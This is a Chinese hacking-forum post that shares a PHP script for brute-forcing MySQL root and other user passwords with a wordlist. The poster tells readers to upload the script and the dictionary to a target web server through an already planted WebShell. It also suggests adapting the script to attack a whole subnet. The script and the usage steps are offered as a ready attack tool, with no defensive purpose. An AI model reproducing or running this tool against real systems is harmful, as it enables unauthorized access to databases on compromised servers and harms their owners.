|
|
- <?
- set_time_limit(0); //脚本不超时
- $ip = "localhost"; //IP
- $user = "root"; //用户名
- $passwd = file("password.txt"); //密码字典
- for($i=0; $i<count($passwd); $i++){
- $pass = Str_Replace("\r\n", "", $passwd[$i]); //剔除多余的回车+换行
- connect($user, $pass);
- flush();
- }
- echo "扫描结束!";
- function connect($user, $pass) {
- if(@mysql_connect($ip, $user, $pass)){
- echo "<font color='#0000FF'><b>得到密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
- exit();
- }
- else {
- echo $pass.'<br>';
- }
- }
- ?>
代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,有点效果,这个以前有人发过,这个是我改过的。
爆破速度奇快无比,暴力2W密码只需要十几秒,密码破解准确率达100%,稍微改一下就可以暴力整个C段的,你懂的……
用法:
1、修改 PHP 代码中的用户名与IP
2、准备字典 password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。 |
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2015-6-12 09:10:27
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡